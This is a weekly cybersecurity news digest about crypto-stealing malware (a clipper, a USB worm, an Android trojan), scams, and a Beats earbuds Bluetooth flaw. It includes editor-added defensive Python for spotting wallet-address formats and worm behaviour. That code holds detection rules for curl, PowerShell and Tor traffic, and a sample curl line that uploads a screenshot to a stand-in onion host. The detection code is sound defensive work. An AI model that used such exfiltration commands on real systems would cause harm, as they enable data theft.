USB worm targeted crypto holders; Apple fixed critical Beats Studio Buds flaw and more cybersecurity news

https://forklog.com/en/usb-worm-targeted-crypto-holders-apple-fixed-critical-beats-studio-buds-flaw-and-more-cybersecurity-news/

Publish Date: 2026-06-20 00:00:00

Source Domain: forklog.com

Author:

The week’s key cybersecurity developments.

We gathered the week’s most important cybersecurity news.

A crypto clipper spread via fake reputation on GitHub and YouTube.
A USB worm self-propagated through hidden Windows shortcuts to steal cryptocurrency.
South Korean law enforcement dismantled a crypto money-laundering network for a Cambodian syndicate.
Researchers found a new Android trojan that steals cryptocurrency.

Crypto clipper spread using fake reputation on GitHub and YouTube
An unidentified attacker launched a large-scale malware campaign using legitimate marketing tactics to build a fake “reputation economy,” according to Check Point Research.
The end goal was to deploy crypto clippers disguised as trading tools in the Solana and Pump.fun ecosystems, as well as betting outcome prediction software.
Phishing page. Source: Check Point Research.
According to the researchers, the clipper is written in Rust and targets Windows and macOS. It covertly and continuously monitors the device's clipboard; when it detects a copied cryptocurrency wallet address, it instantly replaces it with an attacker-controlled address, redirecting the funds.
To build trust with victims — mainly crypto investors and online gamblers — the hacker set up a complex cross-platform infrastructure of “Ghost Networks.” Analysts observed coordinated activity on VirusTotal: a cluster of fake accounts mass-posted positive comments and likes to falsely classify malicious files as safe.
Similar metric manipulation is used on other platforms:

GitHub and SourceForge. The attacker controls a network of accounts to cross-promote repositories. On SourceForge, the download counter was artificially inflated to 44,000 using a farm of Android devices;
YouTube. A channel with more than 91,000 subscribers advertises the software. Tutorial videos use AI voice generators and are accompanied by boosted positive comments;
Media. To legitimize the tool, the hacker uses press release distribution services (for example, EIN Presswire), whose publications are then automatically republished by partner news sites.

Check Point researchers stressed that manipulating crowdsourced platforms signals a dangerous shift in social engineering tactics. The cross-platform reputation-boosting scheme, now proven effective, could be applied to mass distribution of ransomware and more advanced infostealers.
USB worm self-propagated via hidden Windows shortcuts to steal cryptocurrency
Microsoft experts detailed a self-replicating malware campaign targeting cryptocurrency owners.
Infection is triggered when the victim opens a modified .LNK shortcut file on a USB drive. Once launched, the worm silently fetches additional payloads from a command-and-control server hosted as a Tor .onion service.
The malware scans the local system for user documents. On finding them, it hides the originals and replaces them with malicious shortcuts carrying identical filenames, so the malware re-executes every time the user tries to open a work file. For self-propagation, the worm registers a scheduled task that watches the USB ports: as soon as a new USB drive is inserted, it copies itself onto the external media.
Infection chain. Source: Microsoft.
The stealer activates only if Task Manager is not running. It connects to the command server via a built-in Tor executable and checks the clipboard every half second for sensitive data:

12- and 24-word BIP39 seed phrases;
bitcoin wallet addresses (including Legacy, P2SH, Bech32, and Taproot), as well as Ethereum, Tron, and Monero.

When a copied address is detected, the program immediately swaps it for the attacker’s. To fool the victim, the algorithm selects attacker wallets with starting characters that visually match the originals.
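The address and seed-phrase formats listed above, and the leading-character trick described in the previous paragraph, can both be checked mechanically. The Python below is an added example written for this digest, not code from Microsoft's report or from the worm itself: the regexes, function names and sample strings are the editor's own, and the samples are constructed to be format-valid only (prefix, alphabet and length; no checksum verification). compare_paste shows why eyeballing the first few characters of an address is not a defence.

```python
"""Format checks for the clipboard data the worm targets (added example, not
Microsoft's analysis code or the malware's). Regexes validate prefix, alphabet
and length only, not checksums, so a match means "looks like", not "is valid"."""
import re
from typing import Optional

# Base58 alphabet used by Bitcoin, Tron and Monero omits 0, O, I and l.
B58 = r"[1-9A-HJ-NP-Za-km-z]"
# Bech32 alphabet used by bc1q... and bc1p... addresses omits 1, b, i and o.
B32 = r"[qpzry9x8gf2tvdw0s3jn54khce6mua7l]"

ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(rf"^1{B58}{{25,34}}$"),
    "btc_p2sh": re.compile(rf"^3{B58}{{25,34}}$"),
    "btc_bech32": re.compile(rf"^bc1q(?:{B32}{{38}}|{B32}{{58}})$"),  # P2WPKH / P2WSH
    "btc_taproot": re.compile(rf"^bc1p{B32}{{58}}$"),
    "ethereum": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "tron": re.compile(rf"^T{B58}{{33}}$"),
    "monero": re.compile(rf"^[48]{B58}{{94}}$"),  # standard 95-character address
}
SEED_WORD = re.compile(r"^[a-z]{3,8}$")  # BIP39 words are 3..8 lowercase letters


def classify(text: str) -> Optional[str]:
    """Return the kind of secret the string resembles, or None."""
    s = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(s):
            return kind
    words = s.split()
    # Heuristic only: a real check would verify every word against the
    # 2048-word BIP39 list and the mnemonic checksum.
    if len(words) in (12, 24) and all(SEED_WORD.match(w) for w in words):
        return "seed_phrase_candidate"
    return None


def compare_paste(copied: str, pasted: str) -> dict:
    """Compare what was copied with what is about to be pasted or sent.
    'matching_prefix' is how many leading characters agree, i.e. what a victim
    who only glances at the start of the address would see."""
    copied, pasted = copied.strip(), pasted.strip()
    prefix = 0
    for a, b in zip(copied, pasted):
        if a != b:
            break
        prefix += 1
    return {
        "tampered": copied != pasted,
        "copied_kind": classify(copied),
        "pasted_kind": classify(pasted),
        "matching_prefix": prefix,
    }


# Constructed sample values: format-valid strings, not real funded wallets.
VICTIM_BTC = "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"
LOOKALIKE_BTC = "1BvBMSEYabcdefghijkmnopqrstuvwxyzA"  # shares the first 8 characters
SAMPLES = {
    "btc_p2sh": "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy",
    "btc_bech32": "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq",
    "btc_taproot": "bc1p5cyxnuxmeuwuvkwfem96lqzszd02n6xdcjrs20cac6yqjjwudpxqkedrcr",
    "ethereum": "0xd8dA6BF26964aF9D7eEd9e03E53415D37aA96045",
    "tron": "TJRabPrwbZy45sbavfcjinPJC18kjpRTv8",
    "monero": "4" + ("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz" * 2)[:94],
    "seed_phrase_candidate": "abandon " * 11 + "about",
}

if __name__ == "__main__":
    for kind, value in SAMPLES.items():
        print(f"{kind:22} -> {classify(value)}")
    print(compare_paste(VICTIM_BTC, LOOKALIKE_BTC))
```

The only reliable check against a clipper is a full comparison of the pasted address with the one obtained out of band (for example, the first and last several characters shown by the wallet app against the recipient's own confirmation), never a prefix match.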
Beyond clipboard hijacking, every ten seconds the malware takes five screenshots and sends them to the attackers using curl. On a specific server command, it can download and execute arbitrary JavaScript on the infected machine.
This USB worm has been active continuously since at least February. The researchers emphasized that the clearest indicators of compromise are behavioural rather than signature-based: suspicious background activity by wscript.exe and cscript.exe, unexpected launches of curl, PowerShell and cmd.exe, and unexplained network connections to localhost:9050, Tor's default SOCKS proxy port.
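The behavioural indicators above translate directly into triage rules over endpoint telemetry. The following Python is an added example, not Microsoft's detection logic: the rule names are the editor's own, and the events are constructed to resemble Sysmon process-creation (EventID 1) and network-connection (EventID 3) records, with invented paths and script names.

```python
"""Behavioural triage for the USB-worm indicators (added example, not
Microsoft's detection logic). Events are constructed to look like Sysmon
process-creation (EventID 1) and network-connection (EventID 3) records."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBINS = {"curl.exe", "powershell.exe", "cmd.exe"}
TOR_SOCKS_PORT = 9050
# A path on any drive letter other than C: inside a command line, e.g. "E:\..."
NON_SYSTEM_DRIVE = re.compile(r"\b([D-Zd-z]):\\")


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def classify_event(ev: dict):
    """Return the name of the first rule the event trips, or None."""
    if ev.get("EventID") == 1:
        img = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        # Script host executing something from removable media.
        if img in SCRIPT_HOSTS and NON_SYSTEM_DRIVE.search(cmd):
            return "script_host_running_from_removable_media"
        # curl / PowerShell / cmd launched by a script host rather than a user.
        if img in LOLBINS and parent in SCRIPT_HOSTS:
            return "lolbin_spawned_by_script_host"
    elif ev.get("EventID") == 3:
        ip = ev.get("DestinationIp", "")
        port = int(ev.get("DestinationPort", 0))
        # Local connection to the Tor SOCKS port: a bundled Tor client in use.
        if (ip.startswith("127.") or ip == "::1") and port == TOR_SOCKS_PORT:
            return "loopback_connection_to_tor_socks_port"
    return None


def triage(events):
    """Return one finding per event that trips a rule, in event order."""
    findings = []
    for ev in events:
        rule = classify_event(ev)
        if rule is None:
            continue
        detail = ev.get("CommandLine") or f"{ev.get('DestinationIp')}:{ev.get('DestinationPort')}"
        findings.append({"rule": rule, "image": basename(ev.get("Image", "")), "detail": detail})
    return findings


# Constructed sample telemetry; paths, script names, IP and URL are invented.
CONSTRUCTED_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\wscript.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "wscript.exe //B //E:jscript E:\\.cache\\loader.js"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\curl.exe",
     "ParentImage": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "curl.exe -x socks5h://127.0.0.1:9050 -F f=@C:\\Users\\u\\AppData\\Local\\Temp\\1.png http://example.onion/up"},
    {"EventID": 3, "Image": "C:\\Windows\\System32\\curl.exe",
     "DestinationIp": "127.0.0.1", "DestinationPort": 9050},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1"},  # benign: user-launched
    {"EventID": 3, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "DestinationIp": "142.250.74.36", "DestinationPort": 443},  # benign
]

if __name__ == "__main__":
    for f in triage(CONSTRUCTED_EVENTS):
        print(f"[{f['rule']}] {f['image']}: {f['detail']}")
```

Each rule is deliberately narrow so that ordinary administrative use of PowerShell or cmd.exe does not fire; in practice the three findings for one host within a short window (script host from removable media, then a LOLBin child, then loopback traffic to 9050) is the pattern worth paging on.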
South Korean law enforcement dismantled crypto laundering network for Cambodian syndicate
Law enforcement in South Korea detained 23 suspects in a case involving money laundering for a Cambodian phishing organization, Newsis reported.
The scheme operated through a complex transaction-routing network using both domestic South Korean and overseas crypto exchanges. Investigators said that from February 2024 to April 2025 the group moved about 11.1 million USDT.
Police highlighted the vast scale of the infrastructure: roughly 11,300 different accounts were used for laundering. These transit accounts were directly linked to stolen funds totaling about $17 million obtained across 265 incidents.
Police raids seized illicit proceeds worth 650 million won (about $430,000). The operation’s active phase is not yet complete: the suspected organizer remains at large. An Interpol Red Notice has been issued for him, enabling international search and extradition.
Researchers found a new Android trojan that steals cryptocurrency
Security researchers at Zimperium discovered an Android trojan aimed at stealing cryptocurrency.
According to analysts, the Rokarolla malware supports 137 remote commands. Its toolkit can capture PIN codes, read and send SMS, manipulate the clipboard to steal digital assets, and forcibly disable the OS’s built-in protections.
The malware spreads via malicious websites masquerading as installers for popular services like TikTok and Google Chrome.
Initially, the victim downloads an app that visually imitates the Google Play Protect system component. Using this disguise, the dropper employs social engineering to trick the user into granting Accessibility permissions. Once granted, the malware deploys the main payload and immediately disables the real Play Protect scanner.
Rokarolla requesting additional permissions. Source: Zimperium.
Rokarolla downloads fake HTML login pages from its server for each active app on its target list. When the victim opens a legitimate crypto wallet, the trojan instantly overlays it with a fake window and captures all entered credentials.
An additional overlay precisely imitates the standard Android lock screen. This allows the malware to steal the PIN, password, or pattern, giving operators control of the smartphone even when it is locked. To steal cryptocurrency, the trojan uses a built-in clipper that silently monitors the clipboard and replaces copied wallet addresses with the attackers’ details, redirecting transactions.
To bypass two-factor authentication, Rokarolla reads all SMS on the device and can send messages itself, intercepting one-time banking codes. By setting itself as the default app for calls and SMS, the trojan can block incoming calls — meaning a warning call from a bank anti-fraud system may never reach the victim.
Experts emphasized that the main protection against such threats is heightened caution when granting Accessibility permissions, as they trigger the entire attack chain.
Crypto scammers used couriers to collect cash
Attackers have begun hiring couriers to collect funds from victims whose transactions are blocked by bank security systems. The FBI reported the new tactic used by “pig butchering” crypto schemes in a public service announcement.
These scams usually start when fraudsters contact potential victims via social networks, dating sites, and messengers, build trust, and then lure them into fake investment schemes.
After convincing the victim to withdraw cash (for example, under the pretext of a temporary account “freeze”), scammers send a courier to collect it. Identification is done using a prearranged password or the serial number of a specific dollar bill. After receiving the money, the scammers simulate an increase in the victim’s virtual wallet balance and restart the cycle, demanding new payments to cover fictional “withdrawal taxes.”
According to FBI data for 2025, cryptocurrency and investment fraud remains “the most devastating form” of cybercrime in the United States, accounting for 49% of all incidents with total losses of $8.6 billion.
Vulnerability in wireless earbuds let hackers eavesdrop on iPhone users
Apple released a firmware update for Beats Studio Buds wireless earbuds that fixes a high-severity vulnerability.
The flaw, reported by SentinelOne in January, allowed attackers to connect to the device covertly and use the built-in microphone for espionage.
Tracked as CVE-2025-20701, the issue stems from improper authorization in a Bluetooth audio SDK from chipmaker Airoha. The defect lets an attacker within Bluetooth range remotely connect their equipment to the earbuds without the user’s knowledge or consent — provided the headset is not yet paired and is actively seeking connections. The vulnerability has been addressed in Beats firmware version 1B211.
According to the researchers, the flaw can be exploited over Bluetooth Classic (BR/EDR) or Bluetooth Low Energy (BLE) without any authentication. Beyond eavesdropping, the attack gives near-complete control over the device, including reading and rewriting the earbuds' RAM and flash memory. Attackers can also hijack the established trust relationship with a previously paired smartphone, enabling more complex multi-stage attacks.
Also on ForkLog:

An outdated contract on the Aztec network was hacked for $2 million.
Kentucky, following other states, filed a lawsuit against Polymarket.
The UK will ban social networks for children under 16.
Russia’s Supreme Court recognized cryptocurrency as an object of theft.
Bitbank threatened blocks over transactions related to Polymarket.

What to read this weekend?
Ideas that change the world almost always emerge on the periphery — among people their contemporaries consider eccentrics. In a new ForkLog feature, we explore why pioneers like Jack Parsons often remain in the shadow of the revolutions they sparked.
